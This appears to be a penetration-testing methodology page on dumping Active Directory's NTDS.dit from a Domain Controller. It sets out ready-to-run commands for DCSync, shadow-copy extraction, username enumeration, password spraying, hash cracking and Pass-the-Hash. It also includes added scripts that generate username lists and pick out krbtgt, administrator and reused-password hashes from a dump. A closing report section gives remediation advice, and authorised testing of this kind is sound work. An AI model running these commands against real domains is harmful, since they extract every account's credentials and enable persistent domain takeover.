Methodology Checklist
- Requires Domain Admin, or local Administrator on the DC (equivalent), for the on-host methods; DCSync alone needs only the replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All)
- DCSync (preferred, no files touched on the DC): impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm
- Mimikatz DCSync: lsadump::dcsync /user:krbtgt for the single most valuable account, or lsadump::dcsync /all /csv for every account
- Volume Shadow Copy method: vssadmin create shadow /for=C:, then copy NTDS.dit and the SYSTEM hive out of the snapshot
- NXC NTDS dump: nxc smb [DC_IP] -u [USER] -p [PASS] --ntds
- Parse offline: impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
- Prioritise the krbtgt hash (Golden Ticket) and the DA/EA hashes (Pass-the-Hash)
Operational Context
Use when: Domain Controller access achieved → dump NTDS.dit for the NTLM hashes of every domain account, including krbtgt and the Domain Admins.
Think Dumber First: nxc smb [DC] -u [DA_USER] -p [DA_PASS] --ntds → one command that pulls the whole database over the directory replication (DRSUAPI) channel, i.e. a DCSync, without ever reading NTDS.dit on disk. Alternative: VSS shadow copy → offline NTDS.dit extraction when replication traffic is the thing being watched.
Skip when: No DA-level access → every on-host method here needs DC admin privileges; if an account holding replication rights is available instead, use DCSync, which needs no logon to the DC.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| ./username-anarchy -i names.txt | Generate username candidates from real names |
| impacket-GetNPUsers -dc-ip [DC_IP] [DOMAIN]/ -usersfile names.txt -format hashcat | Validate usernames via Kerberos AS-REP (no failed-logon counter, so no lockout) and collect any AS-REP-roastable hashes on the way |
| netexec smb [DC_IP] -u users.txt -p '[PASS]' | Spray one password against the DC (check the lockout policy first) |
| evil-winrm -i [DC_IP] -u [USER] -p [PASS] | Connect to the DC via WinRM |
| vssadmin CREATE SHADOW /For=C: | Create a VSS shadow copy of C: (sidesteps the lock on the live NTDS.dit) |
| cmd /c "mklink /d c:\shadow \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\" | Map the shadow copy device to a normal path |
| cmd /c copy c:\shadow\Windows\NTDS\ntds.dit C:\NTDS\ntds.dit | Copy NTDS.dit out of the shadow copy |
| reg save HKLM\SYSTEM C:\NTDS\SYSTEM | Save the SYSTEM hive (boot key, required for decryption) |
| cmd /c rmdir c:\shadow | Remove the shadow symlink (the snapshot itself stays on the DC until deleted) |
| netexec smb [DC_IP] -u [USER] -p [PASS] -M ntdsutil | Automated NTDS dump via the NetExec ntdsutil module |
| impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL | Extract every domain hash from the downloaded files |
| hashcat -m 1000 [HASH_FILE] rockyou.txt | Crack NT hashes (mode 1000) |
| evil-winrm -i [DC_IP] -u [USER] -H [NT_HASH] | Pass-the-Hash access after the dump |
Deep Dive & Workflow
NTDS.dit Overview
NTDS.dit (Directory Information Tree) is the Active Directory database, stored on every Domain Controller at C:\Windows\NTDS\ntds.dit. It holds every domain account's password hashes, group memberships, Group Policy objects (the policy files themselves live in SYSVOL) and the schema. The hashes inside it are encrypted with the Password Encryption Key (PEK), which is itself encrypted with the boot key derived from HKLM\SYSTEM → both files are required to recover the hashes.
Requirements: Domain Admin, or local Administrator on the DC (in practice the same thing).
Phase 1 - User Enumeration Without Lockout
Before spraying, validate usernames via Kerberos AS-REP. The KDC's reply to an AS-REQ reveals whether the principal exists, and the probe does not count as a failed logon:
- KDC_ERR_PREAUTH_REQUIRED → user exists
- KDC_ERR_C_PRINCIPAL_UNKNOWN → user does not exist
```
impacket-GetNPUsers -dc-ip [DC_IP] [DOMAIN]/ -usersfile names.txt -format hashcat
```
Username naming conventions to generate: jdoe, janedoe, j.doe (check LinkedIn/About pages for real names and for the format the organisation actually uses).
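As an added example (not part of the original page, and not username-anarchy's code), the following shell function expands "First Last" names into the three formats listed above plus two extra ones assumed here (jane.doe and doej); the sample names are constructed, and the output is the names.txt that feeds the GetNPUsers validation step:

```shell
#!/usr/bin/env bash
# Added example (not from the original page): expand real names into username
# candidates. Reads "First Last" lines on stdin and prints lowercase candidates,
# deduplicated, in the order jdoe, janedoe, j.doe, jane.doe, doej.
set -eu

username_candidates() {
  tr 'A-Z' 'a-z' | tr -d "'" | awk '
    NF >= 2 {
      first = $1; last = $NF              # middle names/initials are ignored
      gsub(/-/, "", last)                 # "smith-jones" -> "smithjones"
      i = substr(first, 1, 1)
      print i last                        # jdoe
      print first last                    # janedoe
      print i "." last                    # j.doe
      print first "." last                # jane.doe  (extra format, assumed)
      print last i                        # doej      (extra format, assumed)
    }' | awk '!seen[$0]++'                # drop duplicates across names
}

# Constructed sample input; a real list comes from LinkedIn/About-page scraping.
SAMPLE_NAMES='Jane Doe
John Doe
Ana Maria Smith-Jones'

# Number of candidates the sample produces (12: 5 + 2 new + 5 new).
candidate_count() {
  printf '%s\n' "$SAMPLE_NAMES" | username_candidates | wc -l | tr -d ' '
}

# Write names.txt for: impacket-GetNPUsers -dc-ip [DC_IP] [DOMAIN]/ -usersfile names.txt -format hashcat
printf '%s\n' "$SAMPLE_NAMES" | username_candidates
```

Duplicates are dropped across the whole list so two people with the same initial and surname do not produce the same probe twice; hyphens and apostrophes are stripped because most AD naming schemes do not carry them.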
Phase 2 - VSS Shadow Copy Technique (Manual, No Dumping Tool on the DC)
NTDS.dit is held open by lsass.exe while the DC runs, so it cannot be copied directly. A VSS snapshot exposes a consistent, unlocked copy. Nothing like mimikatz or secretsdump has to land on the DC, which is what keeps AV out of the picture; vssadmin.exe execution is itself a standard EDR detection for credential dumping, though, so "manual" does not mean "silent".
```
vssadmin CREATE SHADOW /For=C:
# Note the shadow copy volume name from the output, e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
# (the number increments with every shadow copy already on the box; use the one printed)
# Map it to a usable path (the \\?\ syntax does not work from a WinRM shell)
cmd /c "mklink /d c:\shadow \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\"
mkdir C:\NTDS
cmd /c copy c:\shadow\Windows\NTDS\ntds.dit C:\NTDS\ntds.dit
reg save HKLM\SYSTEM C:\NTDS\SYSTEM
# Cleanup
cmd /c rmdir c:\shadow
```
Download both files from the Evil-WinRM session: download C:\NTDS\ntds.dit and download C:\NTDS\SYSTEM.
Phase 3 - Automated via NetExec
Faster but noisier → the module runs ntdsutil on the DC to create an IFM media set, which copies ntds.dit and the registry hives, then pulls the files back and parses them:
```
netexec smb [DC_IP] -u [USER] -p [PASS] -M ntdsutil
```
Phase 4 - Offline Hash Extraction
```
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
# Output: User:RID:LM-Hash:NT-Hash:::
# LM-Hash is usually aad3b435b51404eeaad3b435b51404ee (LM storage disabled) → the NT-Hash is the target
```
Crack the NT hashes with hashcat mode 1000, or use them directly for Pass-the-Hash. An NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 is the empty password (typically a disabled account such as Guest), and machine accounts (names ending in $) carry long random passwords, so neither is worth cracking time.
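As an added example (not part of the original page, and not impacket's code), the following shell script triages the text that secretsdump prints for the command above: it pulls out the RID 500 and krbtgt hashes, reports NT hashes shared by more than one account (password reuse), and writes a hashcat -m 1000 --username input that skips machine accounts, password-history rows and empty passwords. The sample dump and its hash values are constructed, and the file name ntds.txt in the usage comment is an assumption:

```shell
#!/usr/bin/env bash
# Added example (not from the original page): triage the text that
# "impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL" prints.
# Each line is account:RID:LM-hash:NT-hash:::; with -history there are also
# account_history0/1/... lines. Every function reads that text on stdin.
set -eu

EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty password

# Drop rows that are not worth cracking: machine accounts (name ends in $,
# random 120-character passwords), password-history rows, empty-password accounts.
skip_uncrackable() {
  awk -F: -v empty="$EMPTY_NT" '
    $1 ~ /\$$/ { next }
    $1 ~ /_history[0-9]+$/ { next }
    $4 == empty { next }
    { print }'
}

# "account:nthash" lines for hashcat -m 1000 --username.
crackable_hashes() {
  skip_uncrackable | awk -F: '{ print $1 ":" $4 }'
}

# The two hashes that matter most: RID 500 (built-in Administrator, whatever it
# was renamed to) for Pass-the-Hash and RID 502 (krbtgt) for Golden Tickets.
tier0_hashes() {
  awk -F: '$2 == 500 || $2 == 502 { print $1 ":" $2 ":" $4 }'
}

# NT hashes shared by more than one crackable account, i.e. password reuse:
# "nthash count account1 account2 ...". Cracking one unlocks all of them, and a
# service account sharing the Administrator password is a finding in itself.
shared_hashes() {
  skip_uncrackable | awk -F: '
    { n[$4]++; who[$4] = who[$4] " " $1 }
    END { for (h in n) if (n[h] > 1) print h, n[h] who[h] }' | sort
}

# Constructed sample dump with fake hash values (real ones are 32 random hex chars).
SAMPLE_DUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
CORP.LOCAL\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
CORP.LOCAL\jdoe_history0:1105:aad3b435b51404eeaad3b435b51404ee:55555555555555555555555555555555:::
CORP.LOCAL\svc_sql:1106:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::'

# Usage: ./triage.sh ntds.txt   (ntds.txt = secretsdump output saved with "> ntds.txt",
# an assumed file name); with no argument the constructed sample is used.
triage() {
  dump="$(if [ "$#" -gt 0 ]; then cat "$1"; else printf '%s\n' "$SAMPLE_DUMP"; fi)"
  echo "== Tier-0 hashes (account:RID:NT) =="
  printf '%s\n' "$dump" | tier0_hashes
  echo "== Password reuse (nthash count accounts) =="
  printf '%s\n' "$dump" | shared_hashes
  echo "== Hashcat input; redirect to a file and run: hashcat -m 1000 --username FILE rockyou.txt =="
  printf '%s\n' "$dump" | crackable_hashes
}
triage "$@"
```

Filtering on RID rather than on the name "Administrator" is deliberate: renaming the built-in account is a common hardening step, but its RID stays 500.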
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc --ntds returns a permission error | Account lacks replication rights (DA or equivalent) | Verify with nxc smb [DC] -u [USER] -p [PASS] that the DC shows Pwn3d!; the account must be DA or hold DS-Replication-Get-Changes and DS-Replication-Get-Changes-All |
| impacket-secretsdump returns "Cannot get domain info" | The DC cannot be reached or resolved from the attacking host | Target the DC by IP: impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] |
| VSS shadow copy creation fails | VSS service not running, or the volume's shadow storage is exhausted | Start it: sc start vss; check the shadow storage allocation for the volume with vssadmin list shadowstorage |
| NTDS.dit extracted but offline decryption fails | SYSTEM hive missing, or taken from a different DC/boot than the database | Both files must come from the same DC: copy ntds.dit AND reg save HKLM\SYSTEM system.save; the boot key in SYSTEM decrypts the PEK that protects the hashes |
| DCSync blocked or alerted by EDR | Replication traffic from a non-DC is monitored (Microsoft Defender for Identity raises a dedicated alert for it) | Extract the files via VSS instead, accepting that vssadmin execution on a DC has its own detections |
Reporting Trigger
Finding Title: NTDS.dit Dumped - All Domain Account Hashes Compromised
Impact: Extraction of NTDS.dit yields the NTLM hashes of every domain account, including krbtgt, the Domain Admins and all service accounts, enabling complete and persistent domain compromise through Pass-the-Hash and Golden Ticket attacks.
Root Cause: Domain Controller compromised with Domain Admin credentials. No monitoring or alerting on shadow copy creation or NTDS.dit access on the DC, or on DCSync replication requests from non-DC sources.
Recommendation: Treat every domain account as compromised: reset all privileged account passwords immediately and plan a domain-wide password reset. Reset the krbtgt password twice, waiting for replication and the maximum ticket lifetime (10 hours by default) between the two resets so that existing Golden Tickets are invalidated. Enable Microsoft Defender for Identity to detect DCSync and alert on shadow copy creation on Domain Controllers. Implement Privileged Access Workstations for DA usage. Enforce MFA for all privileged accounts.